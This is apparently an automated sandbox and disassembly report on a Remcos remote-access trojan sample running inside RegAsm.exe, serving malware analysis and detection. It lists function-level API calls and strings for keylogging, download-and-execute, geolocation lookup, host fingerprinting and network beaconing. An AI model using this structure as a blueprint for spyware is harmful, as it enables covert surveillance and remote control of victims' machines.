                                                          • GetLastError.KERNEL32 ref: 0040A2ED
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                          • TranslateMessage.USER32(?), ref: 0040A34A
                                                          • DispatchMessageA.USER32(?), ref: 0040A355
                                                          Strings
                                                          • Keylogger initialization failure: error , xrefs: 0040A301
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error
                                                          • API String ID: 3219506041-952744263
                                                          • Opcode ID: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                          • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                          • Opcode Fuzzy Hash: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                          • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                          Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1638 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1645 10001177-1000119e lstrlenW FindFirstFileW 1638->1645 1646 10001168-10001172 lstrlenW 1638->1646 1647 100011a0-100011a8 1645->1647 1648 100011e1-100011e9 1645->1648 1646->1645 1649 100011c7-100011d8 FindNextFileW 1647->1649 1650 100011aa-100011c4 call 10001000 1647->1650 1649->1647 1652 100011da-100011db FindClose 1649->1652 1650->1649 1652->1648
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                          • String ID:
                                                          • API String ID: 1083526818-0
                                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                          Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                          • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                          • Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                          • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                          Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                          • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                            • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                            • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                            • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                          • String ID:
                                                          • API String ID: 3950776272-0
                                                          • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                          • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                          • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                          • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                          Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                            • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                            • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                          • ExitProcess.KERNEL32 ref: 0040F8CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 5.1.0 Pro$override$pth_unenc
                                                          • API String ID: 2281282204-182549033
                                                          • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                          • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                          • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                          • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                          Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadExecuteFileShell
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                          • API String ID: 2825088817-3056885514
                                                          • Opcode ID: 91da4de5f95f5ba244ecfd83e46997786a65a1bd925e81a499e122264e232277
                                                          • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                          • Opcode Fuzzy Hash: 91da4de5f95f5ba244ecfd83e46997786a65a1bd925e81a499e122264e232277
                                                          • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                          Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                          • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                          • Opcode Fuzzy Hash: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                          • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                          Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                          • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser
                                                          • String ID:
                                                          • API String ID: 4229901323-0
                                                          • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                          • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                          • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                          • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                          Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                          Function 0040E9C5 Relevance: 88.3, APIs: 15, Strings: 35, Instructions: 795COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 94 40ec1c 88->94 95 40ec1e-40ec2a call 41b2c3 88->95 93 40eef1 89->93 93->49 94->95 104 40ec33-40ec37 95->104 105 40ec2c-40ec2e 95->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 204 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->204 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 190 40ee1e-40ee42 call 40247c call 434798 183->190 184->190 211 40ee51 190->211 212 40ee44-40ee4f call 436e90 190->212 204->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 295 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->295 290->289 291->295 344 40f101 295->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 295->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 367 40f1cc-40f1df call 401e65 call 401fab 357->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 405 40f264-40f26b 401->405 406 40f258-40f262 CreateThread 401->406 410 40f279-40f280 405->410 411 40f26d-40f277 CreateThread 405->411 406->405 412 40f282-40f285 410->412 413 40f28e 410->413 411->410 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                          APIs
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                            • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                          • API String ID: 2830904901-1349597082
                                                          • Opcode ID: c5560d48c4b391896642b8a9574586e8d49993d434eb5e4215b37992ec499472
                                                          • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                          • Opcode Fuzzy Hash: c5560d48c4b391896642b8a9574586e8d49993d434eb5e4215b37992ec499472
                                                          • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                          Function 00414F2A Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 809sleepnetworkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 494 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 507 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 494->507 508 414f74-414f7b Sleep 494->508 523 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->523 524 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->524 508->507 577 4150ec-4150f3 523->577 578 4150de-4150ea 523->578 524->523 579 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 577->579 578->579 606 4151d5-4151e3 call 40482d 579->606 607 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 579->607 612 415210-415225 call 404f51 call 4048c8 606->612 613 4151e5-41520b call 402093 * 2 call 41b4ef 606->613 627 415aa3-415ab5 call 404e26 call 4021fa 607->627 612->627 628 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 612->628 613->627 643 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 627->643 644 415add-415ae5 call 401e8d 627->644 694 415380-41538d call 405aa6 628->694 695 415392-4153b9 call 401fab call 4135a6 628->695 643->644 644->523 694->695 701 4153c0-415a0a call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 695->701 702 4153bb-4153bd 695->702 947 415a0f-415a16 701->947 702->701 948 415a18-415a1f 947->948 949 415a2a-415a31 947->949 948->949 952 415a21-415a23 948->952 950 415a33-415a38 call 40b051 949->950 951 415a3d-415a6f call 405a6b call 402093 * 2 